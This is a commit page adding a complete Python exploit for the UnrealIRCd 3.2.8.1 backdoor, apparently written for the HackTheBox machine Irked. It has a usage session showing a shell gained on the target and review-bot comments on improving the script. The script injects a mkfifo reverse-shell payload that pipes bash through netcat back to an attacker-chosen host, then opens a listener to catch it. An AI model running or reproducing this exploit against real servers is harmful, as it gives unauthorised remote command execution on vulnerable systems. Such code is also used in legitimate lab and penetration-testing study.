Commit 3f2fe8b8 authored by 0xdf

added unrealirc exploit

parent daf7a2e8
## Description
I recently ran into the need to exploit an [UnrealIRCd server](https://www.unrealircd.org/). Version 3.2.8.1 contains a backdoor which can provide RCE. There's already a [Metasploit exploit module](https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor) for the vulnerability, but I didn't really love the scripts I found out there for it. So I wrote my own.
While I developed this script for [Irked from HackTheBox](https://www.hackthebox.eu/home/machines/profile/163), it should be generic to any UnrealIRCd deployment on Linux, provided that a mkfifo reverse shell works on the target.
## Usage
Call the python script with four arguments to identify the target ip and port, and the callback ip and port you want to use. Then, wait and get a shell:
```
root@kali# ./unreal_3.2.8.1_exploit.py 10.10.10.117 6697 10.10.14.14 443
[*] Connecting to 10.10.10.117:6697
[*] Sending payload
[+] Payload sent. Closing socket.
[*] Opening listener. Callback should come within a minute
bash: cannot set terminal process group (634): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
```
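Review bot: The Usage section does not state what the script needs on the operator's machine. The script in this commit starts its listener by shelling out to `nc -nl` and uses f-strings throughout, so it depends on a netcat binary on the PATH and on Python 3.6 or later. Add a short requirements line under Usage. The argument order (`target_ip target_port callback ip callback port`) is also only visible in the sample session and in the script's own usage message, so spell it out in the text.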
#!/usr/bin/env python3
import socket
import subprocess
import sys
if len(sys.argv) != 5:
print(f"Usage: {sys.argv[0]} [target_ip] [target_port] [callback ip] [callback port]")
sys.exit()
rhost, rport, lhost, lport = sys.argv[1:]
print(f"[*] Connecting to {rhost}:{rport}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((rhost, int(rport)))
except:
print(f"[-] Failed to connect to {rhost}:{rport}")
sys.exit(1)
s.recv(100)
print("[*] Sending payload")
s.send(f"AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {lhost} {lport} >/tmp/f\n".encode())
s.close()
print("[+] Payload sent. Closing socket.")
print("[*] Opening listener. Callback should come within a minute")
try:
ncsh = subprocess.Popen(f"nc -nl {lhost} {lport}", shell=True)
ncsh.poll()
ncsh.wait()
except:
print("\n[!] Exiting shell")
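Review bot: Both `except:` clauses are bare. The one around `s.connect((rhost, int(rport)))` reports a non-numeric port as a connection failure and hides the real socket error, and the one around the listener swallows any failure, not only an interrupt. Catch `OSError` (and `ValueError` for the port conversion) on the connect, catch `KeyboardInterrupt` around the listener, and print the exception. The listener is started with `subprocess.Popen(f"nc -nl {lhost} {lport}", shell=True)`, which passes unvalidated command-line arguments through a local shell. Pass an argument list without `shell=True`, and validate `lport` as an integer first, since `rport` goes through `int()` but `lport` never does. Two smaller points: the usage branch calls `sys.exit()` with no status, so a wrong invocation exits 0, and `ncsh.poll()` directly before `ncsh.wait()` has no effect and can be dropped.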